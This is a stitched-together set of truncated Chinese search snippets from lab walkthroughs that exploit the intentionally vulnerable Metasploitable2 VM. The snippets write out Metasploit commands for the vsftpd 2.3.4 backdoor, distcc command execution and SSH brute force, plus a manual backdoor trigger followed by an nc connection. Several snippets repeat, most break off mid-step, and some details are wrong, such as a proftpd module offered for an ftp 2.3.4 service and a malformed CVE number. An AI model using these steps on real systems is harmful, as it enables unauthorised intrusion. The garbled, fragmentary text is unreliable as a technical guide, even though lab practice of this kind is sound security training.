auxiliary/scanner/ftp/anonymous(探测ftp是否允许匿名登录),没有结果。。但是能看到服务版本是2.3.4. 寻找ftp2.3.4版本的漏洞,然后使用这个漏洞exploit/unix/ftp/proftpd_133c_backdoor(在未经身份验证的情况下获取 root 权限) 到此成功利用ftp漏洞获取了靶机的shell。 ssh(22) 探测ssh版本信息(auxiliary/scanner/ss...
1、打开终端,进入msfconsole 2、利用search命令查找我们需要的漏洞模块vsftpd(笑脸漏洞) searsh vsftpd 1. 3、使用漏洞,输入命令 use exploit/unix/ftp/vsftpd_234_backdoor或者use 0 1. 4、查看需要设置的参数 show options 1. 5、只需设置目标主机的IP即可 set rhost 192.168.0.70 1. 6、设置好后便可以开...
Metasploitable2 最先安装的是distccd。这个程序可以使大量代码在网络服务器上进行分布式编译。问题是攻击者可以滥用它来实现一些他们想运行的命令。metasploit在下面例子里证明。 msfconsole msf >use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) >set RHOST 192.168.99.131 msf exploit(distcc_exec) >ex...
Metasploitable2 最先安装的是distccd。这个程序可以使大量代码在网络服务器上进行分布式编译。问题是攻击者可以滥用它来实现一些他们想运行的命令。metasploit在下面例子里证明。 msfconsole msf >use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) >set RHOST 192.168.99.131 msf exploit(distcc_exec) >ex...
21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open ...
靶机:Metasploitable2 IP:192.168.1.136 1、搜索可用攻击模块:search vsftpd 2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor 查看需要设置的参数:show options 需要设置目标ip和端口(默认21) 3、设置目标主机地址:192.168.1.136 4、 运行:run 此时已建立shell连接 ...
ftp 172.16.5.17 这里telnet也可以激活笑脸 账号随便输入一个 Root:) Password:随便输入一个 已经创建好了后面6200后门端口 Nc连接:nc 172.16.5.17 22端口:直接暴力破解 Searchssh_login 搜索模块 Use auxiliary/scanner/ssh/ssh_login 使用模块 Set RHOST 172.16.5.198 设置目标地址 ...
靶机:Metasploitable2 IP:192.168.1.136 1、搜索可用攻击模块:search vsftpd 2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor 查看需要设置的参数:show options 需要设置目标ip和端口(默认21) 3、设置目标主机地址:192.168.1.136 4、 运行:run 此时已建立shell连接 ...
Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一...
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor 这意味着 Vsftpd 2.3.4 及之前的版本都存在这个 backdoor 漏洞。因此这是值得一试的在 Metasploitable 2 上。在 Metasploit 中,也有关于这个后门漏洞的利用模块。 CVE: CVE-2011-02523 ...